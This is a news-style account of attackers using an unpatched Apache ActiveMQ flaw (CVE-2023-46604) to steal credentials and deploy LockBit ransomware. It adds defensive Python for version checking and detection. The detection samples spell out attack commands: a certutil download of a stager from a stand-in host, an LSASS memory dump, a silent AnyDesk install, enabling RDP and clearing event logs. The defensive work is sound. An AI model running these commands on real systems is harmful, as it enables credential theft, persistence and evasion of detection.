From Forgotten Patch to Full Lockdown: How Hackers Turned an ActiveMQ Flaw into Ransomware Mayhem
Subtitle: A missed Apache ActiveMQ update set the stage for a two-stage attack, giving cybercriminals time to steal credentials, escalate privileges, and ultimately unleash LockBit ransomware across a Windows enterprise.
It started with a single, unpatched server and ended with an entire organization’s files held hostage. In a chilling demonstration of patience and precision, threat actors exploited a known Apache ActiveMQ vulnerability - CVE-2023-46604 - not once, but twice, methodically transforming a minor oversight into a full-scale ransomware crisis.
A Breach in Two Acts
The attack began in mid-February 2024 against an internet-facing Apache ActiveMQ server. CVE-2023-46604 is a flaw in the broker's handling of its OpenWire protocol that lets an unauthenticated client make the broker instantiate an arbitrary class from its classpath; Apache had fixed it in ActiveMQ 5.15.16, 5.16.7, 5.17.6 and 5.18.3 in October 2023, months before this intrusion. The attackers used it to execute code by having the broker load a malicious Java Spring XML configuration, which set off a chain reaction: CertUtil downloaded a Metasploit stager, which handed control to the threat actors' command-and-control servers.
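The first question a practitioner asks after reading this is whether a given broker was actually exposed. The check below is an added example, not code from the original report or from the ActiveMQ project: it encodes the fixed versions from the Apache advisory, compares per release branch, and pulls the advertised version out of an OpenWire WireFormatInfo frame under the field encoding stated in the comments (an assumption about the wire format). The handshake bytes are constructed, not a real capture.

```python
"""Branch-aware check of an Apache ActiveMQ version against CVE-2023-46604.

First fixed release on each supported branch (Apache advisory, October 2023).
Everything older than 5.15.16, including every 5.0-5.14 release, is affected."""
import re

FIXED_BY_BRANCH = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}


def parse_version(text):
    """(major, minor, patch) from '5.18.2', 'ActiveMQ 5.16.7', '5.15.16-SNAPSHOT', ..."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version in {text!r}")
    return tuple(int(p) for p in m.groups())


def is_vulnerable(version_text):
    """True if the release predates the fix on its own branch."""
    major, minor, patch = parse_version(version_text)
    if (major, minor) < (5, 15):
        return True                      # end-of-life branches never got a fix
    fixed = FIXED_BY_BRANCH.get((major, minor))
    if fixed is not None:
        return (major, minor, patch) < fixed
    return False                         # 6.x was cut after the fix landed


def provider_version(raw):
    """Pull ProviderVersion out of a raw OpenWire WireFormatInfo frame, the first
    thing a broker sends on TCP 61616. Assumed encoding, following ActiveMQ's
    MarshallingSupport primitive map: key as a 2-byte-length UTF string, then a
    type tag (9 = STRING_TYPE) and a 2-byte-length UTF value."""
    key = b"ProviderVersion"
    i = raw.find(key)
    if i < 0:
        return None
    p = i + len(key)
    if p + 3 > len(raw) or raw[p] != 9:
        return None
    n = int.from_bytes(raw[p + 1:p + 3], "big")
    return raw[p + 3:p + 3 + n].decode("utf-8")


def check_broker(raw):
    """(advertised version, vulnerable?) for one captured handshake frame."""
    v = provider_version(raw)
    return v, (is_vulnerable(v) if v else None)


# Constructed fragment of a WireFormatInfo properties map, not a real capture.
SAMPLE_HANDSHAKE = (
    b"\x00\x00\x00\x01"                      # map entry count (only one shown)
    + len(b"ProviderVersion").to_bytes(2, "big") + b"ProviderVersion"
    + b"\x09" + len(b"5.18.2").to_bytes(2, "big") + b"5.18.2"
)

if __name__ == "__main__":
    print(check_broker(SAMPLE_HANDSHAKE))    # ('5.18.2', True)
```

The per-branch table matters: a plain numeric comparison would call 5.17.5 "newer than 5.15.16" and therefore patched, when it is one release short of the 5.17.6 fix. Inventory scripts that compare against a single version threshold miss exactly the servers this story is about.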
Within 40 minutes the adversaries had escalated privileges to SYSTEM, dumped credentials from LSASS memory, and begun scanning the network over SMB. Armed with a domain admin account, they moved laterally, deploying Metasploit payloads and harvesting still more credentials - this time stumbling upon a privileged service account that would prove critical in the later stage.
Persistence was established by installing AnyDesk as an auto-starting service and enabling RDP through custom scripts. Event logs were wiped in an attempt to erase their tracks, though active antivirus thwarted some lateral movement attempts. Oddly, the attackers made several command syntax errors, suggesting either inexperience with Windows or a flawed attack script. After a day they lost access - but their story was far from over.
The Return - and Ransomware
Eighteen days later the same attackers returned, re-exploiting the same vulnerability from the same infrastructure. This time, using the previously stolen credentials, they reached key systems over RDP, deploying AnyDesk and network scanning tools. Then came the main act: LockBit ransomware, dropped onto backup and file servers and executed over RDP sessions for four hours. The binaries were LockBit builds, but the ransom note broke from tradition, instructing victims to negotiate via a private messaging app rather than LockBit's official channels.
From first breach to detonation, the attackers waited 19 days. Once they re-entered, defenders had less than 90 minutes before widespread encryption began - a testament to the cost of delayed patching and to the evolving tactics of ransomware gangs.
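Every step in the two acts above leaves a host-level trace that a detection engineer can match. The following is an added example, not code from the original report: detection rules for the chain (broker spawning a downloader, LSASS dumping, AnyDesk auto-start, RDP enablement, event-log wiping, and a service account logging on interactively to a backup or file server), run over constructed process-creation (Sysmon Event ID 1 style) and logon (Security Event ID 4624 style) records. Host names, accounts, addresses and the account/host lists are assumptions, and the command-line patterns are common variants of each technique, since the report does not give the actor's exact commands.

```python
"""Detections for the intrusion chain described above, run over constructed
process-creation and logon records. Every event, host, account and address here
is made up for the example; rules encode common variants of each technique."""
import re
from datetime import datetime

SERVICE_ACCOUNTS = {"svc-backup"}   # assumed: accounts that must never log on interactively
CRITICAL_HOSTS = {"bkp01", "fs01"}  # assumed: backup and file servers


def _cmd(e):
    return e.get("cmdline", "").lower()


def broker_spawns_downloader(e):
    """ActiveMQ runs inside java.exe; a child certutil/cmd/powershell fetching a
    URL is the CVE-2023-46604 -> CertUtil -> stager step."""
    parent = e.get("parent_image", "").lower()
    child = e.get("image", "").lower().split("\\")[-1]
    return (e["kind"] == "process" and parent.endswith("java.exe")
            and child in {"certutil.exe", "cmd.exe", "powershell.exe"}
            and ("http://" in _cmd(e) or "https://" in _cmd(e)))


def lsass_dump(e):
    """Credential theft from LSASS memory via the usual dumping tools."""
    c = _cmd(e)
    return e["kind"] == "process" and (
        ("comsvcs" in c and "minidump" in c)
        or ("lsass" in c and any(t in c for t in ("procdump", "sekurlsa", "nanodump"))))


def anydesk_autostart(e):
    """AnyDesk installed as a service, or registered through sc create/config."""
    c = _cmd(e)
    return e["kind"] == "process" and "anydesk" in c and (
        "--install" in c or re.search(r"\bsc(\.exe)?\s+(create|config)\b", c) is not None)


def rdp_enabled(e):
    """fDenyTSConnections set to 0 switches Remote Desktop on."""
    c = _cmd(e)
    return (e["kind"] == "process" and "fdenytsconnections" in c
            and re.search(r"/d\s+0\b", c) is not None)


def log_wipe(e):
    c = _cmd(e)
    return e["kind"] == "process" and (
        re.search(r"\bwevtutil(\.exe)?\s+cl\b", c) is not None or "clear-eventlog" in c)


def service_account_rdp(e):
    """Type-10 (RemoteInteractive) logon by a service account onto a backup or
    file server: how the second act reached the systems LockBit was run on."""
    return (e["kind"] == "logon" and e.get("logon_type") == 10
            and e.get("account", "").lower() in SERVICE_ACCOUNTS
            and e["host"].lower() in CRITICAL_HOSTS)


RULES = [broker_spawns_downloader, lsass_dump, anydesk_autostart,
         rdp_enabled, log_wipe, service_account_rdp]


def run_rules(events):
    """(timestamp, host, rule name) for every match, in time order."""
    return sorted((e["ts"], e["host"], r.__name__) for e in events for r in RULES if r(e))


def minutes_span(hits, host):
    """Minutes between the first and last alert on one host (the 40-minute window above)."""
    ts = [datetime.fromisoformat(t) for t, h, _ in hits if h == host]
    return (max(ts) - min(ts)).total_seconds() / 60 if ts else 0.0


SAMPLE_EVENTS = [  # constructed
    {"ts": "2024-02-14T10:02:00", "host": "mq01", "kind": "process",
     "parent_image": r"C:\Program Files\Java\jre\bin\java.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f http://203.0.113.10/s.bin C:\Windows\Temp\s.bin"},
    {"ts": "2024-02-14T10:30:00", "host": "mq01", "kind": "process",
     "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\Windows\Temp\l.dmp full"},
    {"ts": "2024-02-14T10:35:00", "host": "mq01", "kind": "process",
     "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\Temp\AnyDesk.exe",
     "cmdline": r"AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"},
    {"ts": "2024-02-14T10:38:00", "host": "mq01", "kind": "process",
     "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"ts": "2024-02-14T10:42:00", "host": "mq01", "kind": "process",
     "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": "wevtutil cl Security"},
    # benign noise that must not fire
    {"ts": "2024-02-14T11:00:00", "host": "fs01", "kind": "process",
     "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -hashfile setup.msi SHA256"},
    {"ts": "2024-03-04T09:10:00", "host": "bkp01", "kind": "logon",
     "logon_type": 10, "account": "svc-backup", "src_ip": "10.0.5.23"},
    {"ts": "2024-03-04T09:12:00", "host": "bkp01", "kind": "logon",
     "logon_type": 5, "account": "svc-backup", "src_ip": "-"},   # service logon: expected
]

if __name__ == "__main__":
    for hit in run_rules(SAMPLE_EVENTS):
        print(*hit)
```

The parent-process rule is the one that pays for the rest: a message broker has no business spawning certutil with a URL, and it fires minutes before credentials are dumped. The last rule is what would have caught the return visit; service accounts should be denied interactive and remote-interactive logon by policy, so a type-10 logon from one is a high-confidence signal rather than noise.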
Conclusion
This incident is a stark reminder: patching is not just an IT chore, but a frontline defense. With attackers now willing to wait, learn, and strike twice, organizations must close the window of opportunity before a single missed update becomes an open invitation for disaster.
WIKICROOK
- Apache ActiveMQ: Apache ActiveMQ is an open-source message broker that relays messages between applications over protocols such as OpenWire, AMQP, MQTT and STOMP; its native OpenWire listener runs on TCP port 61616 by default, which is the port exposed in this incident.
- CVE: CVE, or Common Vulnerabilities and Exposures, is a system for uniquely identifying and tracking publicly known cybersecurity flaws in software and hardware.
- Metasploit: Metasploit is a popular open-source penetration-testing framework used by security teams to test exploits and payloads against their own systems; its stagers and payloads are equally usable by attackers, as they were here.
- LSASS: LSASS (Local Security Authority Subsystem Service) is the Windows process that enforces security policy and holds credential material for logged-on users in memory, which makes it a common target for attackers seeking to steal passwords and hashes.
- RDP (Remote Desktop Protocol): RDP is a protocol that lets users remotely access and control another computer over a network, on TCP port 3389 by default; it is widely used for remote support and server management, and just as widely abused once attackers hold valid credentials.